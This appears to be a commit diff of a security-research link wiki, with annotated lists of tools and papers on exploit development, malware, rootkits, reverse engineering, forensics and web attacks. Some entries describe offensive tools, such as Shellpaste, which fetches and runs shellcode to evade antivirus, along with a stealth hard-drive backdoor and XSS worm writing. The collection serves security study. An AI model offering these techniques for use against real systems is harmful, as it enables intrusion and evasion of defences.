* *ORA is a dynamic meta-network assessment and analysis tool developed by CASOS at Carnegie Mellon. It contains hundreds of social network, dynamic network metrics, trail metrics, procedures for grouping nodes, identifying local patterns, comparing and contrasting networks, groups, and individuals from a dynamic meta-network perspective. *ORA has been used to examine how networks change through space and time, contains procedures for moving back and forth between trail data (e.g. who was where when) and network data (who is connected to whom, who is connected to where …), and has a variety of geo-spatial network metrics, and change detection techniques. *ORA can handle multi-mode, multi-plex, multi-level networks. It can identify key players, groups and vulnerabilities, model network changes over time, and perform COA analysis. It has been tested with large networks (106 nodes per 5 entity classes).Distance based, algorithmic, and statistical procedures for comparing and contrasting networks are part of this toolkit. Based on network theory, social psychology, operations research, and management theory a series of measures of “criticality” have been developed at CMU. Just as critical path algorithms can be used to locate those tasks that are critical from a project management perspective, the *ORA algorithms can find those people, types of skills or knowledge and tasks that are critical from a performance and information security perspective.
[Data Science Toolkit](https://github.com/petewarden/dstk)
* A collection of the best open data sets and open-source tools for data science, wrapped in an easy-to-use REST/JSON API with command line, Python and Javascript interfaces. Available as a self-contained VM or EC2 AMI that you can deploy yourself.
* [Documentation](http://www.datasciencetoolkit.org/developerdocs)
[Import.IO](https://import.io/)
* Use our tool to build APIs to all your favorite websites with just a few clicks of the mouse. - Data Scraping
https://www.documentcloud.org/home
http://www.pentaho.com/
[d3js(Data Driven Documents)](http://d3js.org/)
* D3.js is a JavaScript library for manipulating documents based on data. D3 helps you bring data to life using HTML, SVG, and CSS. D3’s emphasis on web standards gives you the full capabilities of modern browsers without tying yourself to a proprietary framework, combining powerful visualization components and a data-driven approach to DOM manipulation.
[Drawing effective network diagrams](https://www.auvik.com/media/blog/effective-network-diagrams/)
[Data Maps](https://datamaps.github.io/)
* Customizable SVG map visualizations for the web in a single Javascript file using D3.js
[Using amCharts to Create Beautiful Wireshark Visualizations](http://www.thevisiblenetwork.com/2015/03/19/using-amcharts-to-create-beautiful-wireshark-visualizations/)
[pewpew](https://github.com/hrbrmstr/pewpew)
* In all seriousness, IPew provides a simple framework - based on Datamaps - for displaying cartographic attack data in a (mostly) responsive way and shows how to use dynamic data via javascript event timers and data queues (in case you're here to learn vs have fun - or both!). You can customize the display through a myriad of query string options, including sounds.
Applied Security Visualization: http://www.secviz.org/content/applied-security-visualization

+ 0
- 23
Draft/Draft/Data Visualization.md View File

@ -1,23 +0,0 @@
##Data Visualization
Check out http://secviz.org/
d3js
[d3js(Data Driven Documents)](http://d3js.org/)
* D3.js is a JavaScript library for manipulating documents based on data. D3 helps you bring data to life using HTML, SVG, and CSS. D3’s emphasis on web standards gives you the full capabilities of modern browsers without tying yourself to a proprietary framework, combining powerful visualization components and a data-driven approach to DOM manipulation.
[Drawing effective network diagrams](https://www.auvik.com/media/blog/effective-network-diagrams/)
[Data Maps](https://datamaps.github.io/)
* Customizable SVG map visualizations for the web in a single Javascript file using D3.js
[Using amCharts to Create Beautiful Wireshark Visualizations](http://www.thevisiblenetwork.com/2015/03/19/using-amcharts-to-create-beautiful-wireshark-visualizations/)
[pewpew](https://github.com/hrbrmstr/pewpew)
* In all seriousness, IPew provides a simple framework - based on Datamaps - for displaying cartographic attack data in a (mostly) responsive way and shows how to use dynamic data via javascript event timers and data queues (in case you're here to learn vs have fun - or both!). You can customize the display through a myriad of query string options, including sounds.
Applied Security Visualization: http://www.secviz.org/content/applied-security-visualization

Draft/Draft/Embedded Device & Hardware Hacking.md → Draft/Draft/Embedded Device & Hardware Hacking -.md View File


+ 9
- 0
Draft/Draft/Exfiltration.md View File

@ -34,3 +34,12 @@ Draft emails
Stunnel
###Papers
[Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control](http://ericchen.me/self_exfiltration.pdf)
* Abstract —Since the early days of Netscape, browser vendors and web security researchers have restricted out-going data based on its destination. The security argument accompanying these mechanisms is that they prevent sensitive user data from being sent to the attacker’s domain. However, in this paper, we show that regulating web information flow based on its destination server is an inherently flawed security practice. It is vulnerable to self-exfiltration attacks, where an adversary stashes stolen information in the database of a whitelisted site, then later independently connects to the whitelisted site to retrieve the information. We describe eight existing browser security mechanisms that are vulnerable to these “self-exfiltration” attacks. Furthermore, we discovered at least one exfiltration channel for each of the Alexa top 100 websites. None of the existing information flow control mechanisms we surveyed are sufficient to protect data from being leaked to the attacker. Our goal is to prevent browser vendors and researchers from falling into this trap by designing more systems that are vulnerable to self-exfiltration.

+ 6
- 1
Draft/Draft/Exploit Development.md View File

@ -35,6 +35,11 @@ Exploit dev -
###Cull
[The Userland Exploits of Pangu 8](http://blog.pangu.io/wp-content/uploads/2015/03/CanSecWest2015_Final.pdf)
[OllyDbg Tricks for Exploit Development](http://resources.infosecinstitute.com/in-depth-seh-exploit-writing-tutorial-using-ollydbg/)
@ -47,7 +52,7 @@ When run on a machine vulnerable to the rowhammer problem, the process was able
https://github.com/demi6od/Smashing_The_Browser
[Subverting PatchGuard Version 2](http://uninformed.org/?v=all&a=28&t=sumry)


+ 5
- 1
Draft/Draft/Forensics Incident Response/add cull.txt View File

@ -16,13 +16,17 @@
[Extensible Metadata Platform](https://en.wikipedia.org/wiki/Extensible_Metadata_Platform)
* The Extensible Metadata Platform (XMP) is an ISO standard, originally created by Adobe Systems Inc., for the creation, processing and interchange of standardized and custom metadata for digital documents and data sets.
[Firmware Forensics: Diffs, Timelines, ELFs and Backdoors](http://w00tsec.blogspot.com/2015/02/firmware-forensics-diffs-timelines-elfs.html)
[Real-time Steganography with RTP](http://uninformed.org/?v=all&a=36&t=sumry)
* Real-time Transfer Protocol (RTP) is used by nearly all Voice-over-IP systems to provide the audio channel for calls. As such, it provides ample opportunity for the creation of a covert communication channel due to its very nature. While use of steganographic techniques with various audio cover-medium has been extensively researched, most applications of such have been limited to audio cover-medium of a static nature such as WAV or MP3 file audio data. This paper details a common technique for the use of steganography with audio data cover-medium, outlines the problem issues that arise when attempting to use such techniques to establish a full-duplex communications channel within audio data transmitted via an unreliable streaming protocol, and documents solutions to these problems. An implementation of the ideas discussed entitled SteganRTP is included in the reference materials.
[Windows Memory Analysis Checklist](http://www.dumpanalysis.org/windows-memory-analysis-checklist)
[MozillaRecovery](https://github.com/gtfy/MozillaRecovery)
* Recovers the master password of key3.db files, i.e. Thunderbird, Firefox
[Exfil Framework](https://github.com/reservoirlabs/bro-scripts/tree/master/exfil-detection-framework)
* The Exfil Framework is a suite of Bro scripts that detect file uploads in TCP connections. The Exfil Framework can detect file uploads in most TCP sessions including sessions that have encrypted payloads (SCP,SFTP,HTTPS).


+ 4
- 0
Draft/Draft/Fuzzing Bug Hunting.md View File

@ -16,6 +16,10 @@ Miscellaneous
[afl-dyninst ; AFL Fuzzing blackbox binaries](https://github.com/vrtadmin/moflow/tree/master/afl-dyninst)
* American Fuzzy Lop + Dyninst == AFL Fuzzing blackbox binaries The tool has two parts. The instrumentation tool and the instrumentation library. Instrumentation library has an initialization callback and basic block callback functions which are designed to emulate what AFL is doing with afl-gcc/afl-g++/afl-as. Instrumentation tool (afl-dyninst) instruments the supplied binary by inserting callbacks for each basic block and an initialization callback either at _init or at specified entry point.
http://nullcon.net/website/archives/ppt/goa-15/analyzing-chrome-crash-reports-at-scale-by-abhishek-arya.pdf
[browserfuzz](https://bitbucket.org/blackaura/browserfuzz)


+ 3
- 0
Draft/Draft/Honeypots -.md View File

@ -55,6 +55,9 @@ Beeswarm](http://www.beeswarm-ids.org/)
[dionea](http://dionaea.carnivore.it/)
* dionaea intention is to trap malware exploiting vulnerabilities exposed by services offerd to a network, the ultimate goal is gaining a copy of the malware.
[Kippo](https://github.com/desaster/kippo)
* Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.
[Glastopf Project](http://glastopf.org/)
* Glastopf is a Honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications. The principle behind it is very simple: Reply the correct response to the attacker exploiting the web application. The project has been kicked off by Lukas Rist in 2009 and the results we are got during this time are very promising and are an incentive to put even more effort in the development of this unique tool. Read the tool description for further information. We are working together with different people, organizations and institutions to get the best from the collected data. Find out more about collaborating with the project.


Draft/Draft/Lockpicking.md → Draft/Draft/Lockpicking -.md View File


+ 20
- 0
Draft/Draft/Logging - Combine with NSM.md View File

@ -3,10 +3,30 @@
ELK Stack
Logstash/Kibana Elastic Search
[Graphite - Scalable Realtime Graphing](http://graphite.wikidot.com/start)
* [Quick Start Guide](http://graphite.wikidot.com/quickstart-guide)
[Syslong-ng](https://github.com/balabit/syslog-ng)
* syslog-ng is an enhanced log daemon, supporting a wide range of input and output methods: syslog, unstructured text, message queues, databases (SQL and NoSQL alike) and more.
[logstash anonymize](http://logstash.net/docs/1.4.2/filters/anonymize)
* Anonymize fields using by replacing values with a consistent hash.
[StatsD](https://github.com/etsy/statsd/)
* A network daemon that runs on the Node.js platform and listens for statistics, like counters and timers, sent over UDP or TCP and sends aggregates to one or more pluggable backend services (e.g., Graphite).
[Spotting the Adversary with Windows Event Log Monitoring - NSA](https://www.nsa.gov/ia/_files/app/Spotting_the_Adversary_with_Windows_Event_Log_Monitoring.pdf)


+ 5
- 0
Draft/Draft/Malware.md View File

@ -9,6 +9,11 @@
[Shellpaste](https://github.com/andrew-morris/shellpaste)
* Tiny snippet of code that pulls ASCII shellcode from pastebin and executes it. The purpose of this is to have a minimal amount of benign code so AV doesn't freak out, then it pulls down the evil stuff. People have been doing this kind of stuff for years so I take no credit for the concept. That being said, this code (or similar code) works surprisingly often during pentests when conventional malware fails.
[Locreate: An Anagram for Relocate ](http://uninformed.org/?v=all&a=30&t=sumry)
* This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation. This difference can make binaries packed using this technique more difficult to signature and analyze, but only when presented to an untrained eye. The description of this technique is meant to be an example of a fun thought exercise and not as some sort of revolutionary packer. In fact, it's been used in the virus world many years prior to this paper.


+ 34
- 21
Draft/Draft/Programming - Languages Libs Courses References.md View File

@ -15,12 +15,13 @@ Python
###Cull
[Secure Coding Standards - Android](https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=111509535)
[Understanding Python Bytecode](http://security.coverity.com/blog/2014/Nov/understanding-python-bytecode.html)
[Obfuscating python](https://reverseengineering.stackexchange.com/questions/1943/what-are-the-techniques-and-tools-to-obfuscate-python-programs)
[Secure Coding Standards - Android](https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=111509535)
@ -33,18 +34,15 @@ Python
* Introduction for those who don’t know ASM and a reference for those that do.
[WinAppDbg](http://winappdbg.sourceforge.net/)
* The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. It uses ctypes to wrap many Win32 API calls related to debugging, and provides a powerful abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test or fuzz Windows applications with quickly coded Python scripts. Several ready to use tools are shipped and can be used for this purposes. Current features also include disassembling x86/x64 native code, debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing.
[Killing the Rootkit](http://blog.ioactive.com/2014/09/killing-rootkit.html)
[Slides - Weird - Machine Motivated Practical Page Table Shellcode & Finding Out What's Running on Your System](https://www.defcon.org/images/defcon-22/dc-22-presentations/Macaulay/DEFCON-22-Shane-Macaulay-Weird-Machine-Motivated-Practical-Page-Table-Shellcode-UPDATED.pdf)
###General
@ -80,33 +78,40 @@ http://opensecuritytraining.info/IntroX86.html
[x86 Disassembly/Calling Conventions](https://en.wikibooks.org/wiki/X86_Disassembly/Calling_Conventions)
[x86 Disassembly/Calling Convention Examples](https://en.wikibooks.org/wiki/X86_Disassembly/Calling_Convention_Examples)
[Walkthrough: Creating and Using a Dynamic Link Library (C++)](https://msdn.microsoft.com/en-us/library/ms235636.aspx)
###Source Code Analysis
[RIPS]http://rips-scanner.sourceforge.net/)
* RIPS is a tool written in PHP to find vulnerabilities in PHP applications using static code analysis. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis.
Videos
###Videos
[Introduction Video Series(6) to x86 Assembly](https://www.youtube.com/watch?v=qn1_dRjM6F0&list=PLPXsMt57rLthf58PFYE9gOAsuyvs7T5W9)
Papers
###Papers
[Mov is turing complete](http://www.cl.cam.ac.uk/~sd601/papers/mov.pdf)
###C
[Stanford C 101](http://cslibrary.stanford.edu/101/EssentialC.pdf)
* Stanford CS Education Library: A 45 page summary of the C language. Explains all the common features and techniques for the C language. The coverage is pretty quick, so it is most appropriate for someone with some programming background who needs to see how C works. Topics include variables, int types, floating point types, promotion, truncation, operators, control structures (if, while, for), functions, value parameters, reference parameters, structs, pointers, arrays, the pre-processor, and the standard C library functions. (revised 4/2003)
[Homepage](http://cslibrary.stanford.edu/101/)
Stanford C 101
Stanford CS Education Library: A 45 page summary of the C language. Explains all the common features and techniques for the C language. The coverage is pretty quick, so it is most appropriate for someone with some programming background who needs to see how C works. Topics include variables, int types, floating point types, promotion, truncation, operators, control structures (if, while, for), functions, value parameters, reference parameters, structs, pointers, arrays, the pre-processor, and the standard C library functions. (revised 4/2003)
http://cslibrary.stanford.edu/101/
http://cslibrary.stanford.edu/101/EssentialC.pdf
[Stanford C Pointers and Memory](http://cslibrary.stanford.edu/102/PointersAndMemory.pdf)
* Stanford CS Education Library: a 31 page introduction to programming with pointers and memory in C, C++ and other languages. Explains how pointers and memory work and how to use them -- from the basic concepts through all the major programming techniques. Can be used as an introduction to pointers for someone with basic programming experience or as a quick review. Many advanced programming and debugging problems only make sense with a solid understanding of pointers and memory -- this document tries to provide that understanding.
* [Homepage](http://cslibrary.stanford.edu/102/)
Stanford C Pointers and Memory
Stanford CS Education Library: a 31 page introduction to programming with pointers and memory in C, C++ and other languages. Explains how pointers and memory work and how to use them -- from the basic concepts through all the major programming techniques. Can be used as an introduction to pointers for someone with basic programming experience or as a quick review. Many advanced programming and debugging problems only make sense with a solid understanding of pointers and memory -- this document tries to provide that understanding.
http://cslibrary.stanford.edu/102/
http://cslibrary.stanford.edu/102/PointersAndMemory.pdf
###Python
[Hachoir](https://bitbucket.org/haypo/hachoir/wiki/Home)
@ -114,8 +119,9 @@ http://cslibrary.stanford.edu/102/PointersAndMemory.pdf
[Python Library for interacting with Serial Ports](http://pyserial.sourceforge.net/)
[Shellpaste](https://github.com/andrew-morris/shellpaste)
* Tiny snippet of code that pulls ASCII shellcode from pastebin and executes it. The purpose of this is to have a minimal amount of benign code so AV doesn't freak out, then it pulls down the evil stuff. People have been doing this kind of stuff for years so I take no credit for the concept. That being said, this code (or similar code) works surprisingly often during pentests when conventional malware fails.
[Understanding Python Bytecode](http://security.coverity.com/blog/2014/Nov/understanding-python-bytecode.html)
[Obfuscating python](https://reverseengineering.stackexchange.com/questions/1943/what-are-the-techniques-and-tools-to-obfuscate-python-programs)
[Equip: python bytecode instrumentation](https://github.com/neuroo/equip)
* equip is a small library that helps with Python bytecode instrumentation. Its API is designed to be small and flexible to enable a wide range of possible instrumentations. The instrumentation is designed around the injection of bytecode inside the bytecode of the program to be instrumented. However, the developer does not need to know anything about the Python bytecode since the injected code is Python source.
@ -143,3 +149,10 @@ $err = $ErrorSource + " reports: " + $ErrorMessage
}
"""
###Useful Libraries/programs
[Shellpaste](https://github.com/andrew-morris/shellpaste)
* Tiny snippet of code that pulls ASCII shellcode from pastebin and executes it. The purpose of this is to have a minimal amount of benign code so AV doesn't freak out, then it pulls down the evil stuff. People have been doing this kind of stuff for years so I take no credit for the concept. That being said, this code (or similar code) works surprisingly often during pentests when conventional malware fails.

+ 31
- 1
Draft/Draft/Reverse Engineering.md View File

@ -43,13 +43,20 @@ Wikis & Useful Sites
[SATCOM Terminals Hacking by Air, Sea, and Land - Black Hat USA 2014](https://www.youtube.com/watch?v=tRHDuT__GoM)
[Reverse Engineering Flash Memory for Fun and Benefit - BlackHat 2014](https://www.youtube.com/watch?v=E8BSnS4-Kpw)
[PE File Format Graphs](http://blog.dkbza.org/2012/08/pe-file-format-graphs.html?view=mosaic)
https://github.com/droidsec/droidsec.github.io/wiki/Android-Crackmes
[Bindead - static binary binary analysis tool](https://bitbucket.org/mihaila/bindead/wiki/Home)
* Bindead is an analyzer for executable machine code. It features a disassembler that translates machine code bits into an assembler like language (RREIL) that in turn is then analyzed by the static analysis component using abstract interpretation.
[Statically Linked Library Detector](https://github.com/arvinddoraiswamy/slid)
[BitBlaze](http://bitblaze.cs.berkeley.edu/)
* The BitBlaze project aims to design and develop a powerful binary analysis platform and employ the platform in order to (1) analyze and develop novel COTS protection and diagnostic mechanisms and (2) analyze, understand, and develop defenses against malicious code. The BitBlaze project also strives to open new application areas of binary analysis, which provides sound and effective solutions to applications beyond software security and malicious code defense, such as protocol reverse engineering and fingerprint generation.
@ -72,6 +79,9 @@ https://github.com/droidsec/droidsec.github.io/wiki/Android-Crackmes
[Frida](http://www.frida.re/docs/home/)
* Inject JS into native apps
[Rdis](https://github.com/endeav0r/rdis)
* Rdis is a Binary Analysis Tool for Linux.
[Python RE tools list](http://pythonarsenal.erpscan.com/)
[Static binary analysis tool](https://github.com/bdcht/amoco)
@ -86,6 +96,8 @@ Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extr
* Interactive code tracer for reverse-engineering proprietary software
####Frameworks
@ -110,6 +122,21 @@ Radare2 - unix-like reverse engineering framework and commandline tools ](http:/
[OllyDbg](http://www.ollydbg.de/)
* OllyDbg is a 32-bit assembler level analysing debugger for Microsoft® Windows®. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.
[WinDbg](
*
*[Excellent Resource Site](http://www.windbg.org/)
*[Crash Dump Analysis Poster](http://www.dumpanalysis.org/CDAPoster.html)
* [Getting Started with WinDbg (User-Mode)](https://msdn.microsoft.com/en-us/library/windows/hardware/dn745911%28v=vs.85%29.aspx)
* [Getting Started with WinDbg (Kernel-Mode)](https://msdn.microsoft.com/en-us/library/windows/hardware/dn745912%28v=vs.85%29.aspx)
[WinAppDbg](http://winappdbg.sourceforge.net/)
* The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. It uses ctypes to wrap many Win32 API calls related to debugging, and provides a powerful abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test or fuzz Windows applications with quickly coded Python scripts. Several ready to use tools are shipped and can be used for this purposes. Current features also include disassembling x86/x64 native code, debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing.
[Open Source Windows x86/x64 Debugger](http://x64dbg.com/)
[xnippet](https://github.com/isislab/xnippet)
@ -132,6 +159,9 @@ programming environment.
* IDA Pomidor is a fun and simple plugin for the Hex-Ray's IDA Pro disassembler that will help you retain concentration and productivity during long reversing sessions.
[Hopper](http://www.hopperapp.com/)
* Hopper is a reverse engineering tool for OS X and Linux, that lets you disassemble, decompile and debug your 32/64bits Intel Mac, Linux, Windows and iOS executables!
* quote from a friend on irc: "IF u RLY like guis this is also a cheap option"
[Reverse](https://github.com/joelpx/reverse)


+ 9
- 0
Draft/Draft/Rootkits.md View File

@ -16,6 +16,13 @@ Papers
###Cull
[Implementation and Implications of a Stealth Hard-Drive Backdoor](https://www.ibr.cs.tu-bs.de/users/kurmus/papers/acsac13.pdf)
* Modern workstations and servers implicitly trust hard disks to act as well-behaved block devices. This paper analyzes the catastrophic loss of security that occurs when hard disks are not trustworthy. First, we show that it is possible to compromise the firmware of a commercial o -the-shelf hard drive, by resorting only to public information and reverse engineering. Using such a compromised firmware, we present a stealth rootkit that replaces arbitrary blocks from the disk while they are written, providing a data replacement back- door . The measured performance overhead of the compromised disk drive is less than 1% compared with a normal, non-malicious disk drive. We then demonstrate that a re- mote attacker can even establish a communication channel with a compromised disk to infiltrate commands and to ex-filtrate data. In our example, this channel is established over the Internet to an unmodified web server that relies on the compromised drive for its storage, passing through the original webserver, database server, database storage engine, filesystem driver, and block device driver. Additional experiments, performed in an emulated disk-drive environment, could automatically extract sensitive data such as /etc/shadow (or a secret key le) in less than a minute. This paper claims that the diffculty of implementing such an at- tack is not limited to the area of government cyber-warfare; rather, it is well within the reach of moderately funded criminals, botnet herders and academic researchers.
[Killing the Rootkit](http://blog.ioactive.com/2014/09/killing-rootkit.html)
Defeating Sniffers and Intrustion Detection Systems - Horizon, 12/25/1998
Armouring the ELF: Binary Encryption on the UNIX Platform - grugq, scut, 12/28/2001
Runtime Process Infection - anonymous, 07/28/2002
@ -25,6 +32,8 @@ Stealth Hooking: Another Way to Subvert the Windows Kernel - mxatone, ivanlef0u,
Mystifying the Debugger for Ultimate Stealthness - halfdead, 04/11/2008
Binary Mangling with Radare - pancake, 06/11/2009
[Concepts for the Steal the Windows Rootkit (The Chameleon Project)Joanna Rutkowska2003](http://repo.hackerzvoice.net/depot_madchat/vxdevl/avtech/Concepts%20for%20the%20Stealth%20Windows%20Rootkit%20%28The%20Chameleon%20Project%29.pdf)
* Many people do not realize the real danger from rootkit technology. One reason for this is probably that publicly available rootkits for Windows OS are relatively easy to detect by conventional methods (i.e.memoryscanningbased). However, we can imagine some techniques of rootkit implementation, which will be undetectable by these methods, even if the rootkit concept will be publicly available. 000In order to convince people that traditional rootkit detection is insufficient it would be desirable to have a working rootkit implementing such sophisticated technology. Besides, it would be fun.
http://www.phrack.com/papers/revisiting-mac-os-x-kernel-rootkits.html


+ 1
- 1
Draft/Draft/System Internals Windows and Linux Internals Reference.md View File

@ -97,7 +97,7 @@ WinPrefetchView is a small utility that reads the Prefetch files stored in your
[Pushing the Limits of Windows: Virtual Memory](http://blogs.technet.com/b/markrussinovich/archive/2008/11/17/3155406.aspx)
[PE File Format Graphs](http://blog.dkbza.org/2012/08/pe-file-format-graphs.html?view=mosaic)


+ 17
- 2
Draft/Draft/To Do/add cull -1.txt View File

@ -4,7 +4,7 @@ http://projectshellcode.com/?q=node/12
[Enumerating DNSSEC NSEC and NSEC3 Records](https://www.altsci.com/concepts/page.php?s=dnssec&p=1)
http://www.legbacore.com/Research.html
@ -14,6 +14,21 @@ http://www.legbacore.com/Research.html
* This guide explains how to build custom live system images for security sandboxing using tools from the Debian Live Systems project and Grsecurity. For concreteness we will focus on building a custom live image for sandboxing the Firefox web browser (also known as Iceweasel in the Debian world). However, the same tools and procedures will allow you to build any kind of Debian-based live image you want.
https://www.owasp.org/index.php/Secure_Coding_Cheat_Sheet
https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet
[Bootkit Disk Forensics
[Part 1](http://www.malwaretech.com/2015/02/bootkit-disk-forensics-part-1.html)
[Part 2](http://www.malwaretech.com/2015/03/bootkit-disk-forensics-part-2.html)
[Github dorks - finding vulns](http://blog.conviso.com.br/2013/06/github-hacking-for-fun-and-sensitive.html)
[rdtsc x86 instruction to detect virtual machines](http://blog.badtrace.com/post/rdtsc-x86-instruction-to-detect-vms/)
@ -45,7 +60,7 @@ shellcode tutorials http://projectshellcode.com/?q=node/12
[QR Inception: Barcode-in-Barcode Attacks](https://www.sba-research.org/wp-content/uploads/publications/qrinception.pdf)
* 2D barcodes offer many benefits compared to 1D barcodes, such as high information density and robustness. Before their introduction to the mobile phone ecosystem, they have been widely used in speci c applications, such as logistics or ticketing. However, there are multiple competing standards with different benefits and drawbacks. Therefore, reader applications as well as dedicated devices have to support multiple standards. In this paper, we present novel attacks based on deliberately caused ambiguities when especially crafted barcodes conform to multiple standards. Implementation details de- cide which standard the decoder locks on. This way, two users scanning the same barcode with di erent phones or apps will receive different content. This potentially opens way for multiple problems related to security. We describe how embedding one barcode symbology into another can be used to perform phishing attacks as well as targeted exploits. In addition, we evaluate the extent to which popular 2D barcode reader applications on smartphones are susceptible to these barcode-in-barcode attacks. We furthermore discuss mitigation techniques against this type of attack.
* 2D barcodes offer many benefits compared to 1D barcodes, such as high information density and robustness. Before their introduction to the mobile phone ecosystem, they have been widely used in specific applications, such as logistics or ticketing. However, there are multiple competing standards with different benefits and drawbacks. Therefore, reader applications as well as dedicated devices have to support multiple standards. In this paper, we present novel attacks based on deliberately caused ambiguities when especially crafted barcodes conform to multiple standards. Implementation details decide which standard the decoder locks on. This way, two users scanning the same barcode with different phones or apps will receive different content. This potentially opens way for multiple problems related to security. We describe how embedding one barcode symbology into another can be used to perform phishing attacks as well as targeted exploits. In addition, we evaluate the extent to which popular 2D barcode reader applications on smartphones are susceptible to these barcode-in-barcode attacks. We furthermore discuss mitigation techniques against this type of attack.


+ 176
- 81
Draft/Draft/Web & Browsers.md View File

@ -5,187 +5,234 @@
TOC
Intro
General
Cull
General Attacks & OWASP Top Ten
Databases
* MongoDB
* PostgreSQL
* Mysql
* Oracle
* MSSQL
Securing Web Applications
Books
Papers
Talks
Reference Sites
CMSs
Web Application Attacks & Write-ups
WebShells
11
###General
[Postcards from a Post-XSS World - Michael Zalewski](http://lcamtuf.coredump.cx/postxss/#dangling-markup-injection)
* This page is a rough collection of notes on some of the fundamental alternatives to direct script injection that would be available to attackers following the universal deployment of CSP or other security mechanisms designed to prevent the execution of unauthorized scripts. I hope to demonstrate that in many cases, the capabilities offered by these alternative methods are highly compatible with the goals of contemporary XSS attacks.
[Javascript De-Obfuscation Tools Redux](http://www.kahusecurity.com/2014/javascript-deobfuscation-tools-redux/)
* Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention.
http://yehg.net/encoding/
[Unphp.net php decoder](http://www.unphp.net/decode/)
[Various forms of encoding/decoding web app](http://yehg.net/encoding/)
###Cull
prompt.ml
[Client Identification Mechanisms](http://www.chromium.org/Home/chromium-security/client-identification-mechanisms)
[Cookieless Monster: Exploring the Ecosystem of Web-based Device Fingerprinting](http://securitee.org/files/cookieless_sp2013.pdf)
* Abstract —The web has become an essential part of our society and is currently the main medium of information delivery. Billions of users browse the web on a daily basis, and there are single websites that have reached over one billion user accounts. In this environment, the ability to track users and their online habits can be very lucrative for advertising companies, yet very intrusive for the privacy of users. In this paper, we examine how web-based device fingerprint- ing currently works on the Internet. By analyzing the code of three popular browser-fingerprinting code providers, we reveal the techniques that allow websites to track users without the need of client-side identifiers. Among these techniques, we show how current commercial fingerprinting approaches use questionable practices, such as the circumvention of HTTP proxies to discover a user’s real IP address and the installation of intrusive browser plugins. At the same time, we show how fragile the browser ecosystem is against fingerprinting through the use of novel browser- identifying techniques. With so many different vendors involved in browser development, we demonstrate how one can use diversions in the browsers’ implementation to distinguish successfully not only the browser-family, but also specific major and minor versions. Browser extensions that help users spoof the user-agent of their browsers are also evaluated. We show that current commercial approaches can bypass the extensions, and, in addition, take advantage of their shortcomings by using them as additional fingerprinting features.
[Security and Open Redirects Impact of 301-ing people in 2013](https://makensi.es/rvl/openredirs/#/)
[Writing an XSS Worm](http://blog.gdssecurity.com/labs/2013/5/8/writing-an-xss-worm.html)
https://xss-game.appspot.com/
XSS game http://escape.alf.nu/
[SSL/TLS Interception Proxies and Transitive Trust](http://media.blackhat.com/bh-eu-12/Jarmoc/bh-eu-12-Jarmoc-SSL_TLS_Interception-WP.pdf)
* Secure Sockets Layer (SSL) [ 1 ] and its successor Transport Layer Security (TLS) [ 2 ] have become key components of the modern Internet . The privacy, integrity, and authenticity [ 3 ] [ 4 ] provided by these protocols are critical to allowing sensitive communications to occur . Without these systems, e - commerce, online banking , and business - to - business exchange of information would likely be far less frequent. Threat actors have also recognized the benefits of transport security, and they are increasingly turning to SSL to hide their activities . Advanced Persistent Threat ( APT ) attackers [ 5 ] , botnets [ 6 ] , and eve n commodity web attacks can leverage SSL encryption to evade detection. To counter these tactics, organizations are increasingly deploying security controls that intercept end - to - end encrypted channels. Web proxies, data loss prevention ( DLP ) systems, spec ialized threat detection solutions, and network intrusion prevention systems ( N IPS ) offer functionality to intercept, inspect , and filter encrypted traffic. Similar functionality is present in lawful intercept systems and solutions enabling the broad surve illance of encrypted communications by governments. Broadly classified as “SSL/TLS interception proxies ,” these solutions act as a “ man in the middle , ” violating the end - to - end security promises of SSL. This type of interception comes at a cost . Intercepti ng SSL - encrypted connections sacrifices a degree of privacy and integrity for the benefit of content inspection, often at the risk of authenticity and endpoint validation . Implementers and designers of SSL interception proxies should consider these risks and understand how their systems operate in unusual circumstances
###Educational
[Intro to content Security Policy](www.html5rocks.com/en/tutorials/security/content-security-policy/)
###General Tools
[ParrotNG](https://github.com/ikkisoft/ParrotNG/releases)
* ParrotNG is a Java-based tool for automatically identifying vulnerable SWF files, built on top of swfdump. One JAR, two flavors: command line tool and Burp Pro Passive Scanner Plugin.
[WebAppSec Testing Checklist](http://tuppad.com/blog/wp-content/uploads/2012/03/WebApp_Sec_Testing_Checklist.pdf)
[HTTPie - curl for humans](https://github.com/jakubroztocil/httpie)
* HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
http://google-gruyere.appspot.com/part1
[leaps - shared text editing in Golang](https://github.com/denji/leaps)
* Leaps is a service for hosting collaboratively edited documents using operational transforms to ensure zero-collision synchronization across any number of editing clients.
[HTTrack - Website Copier](https://www.httrack.com/)
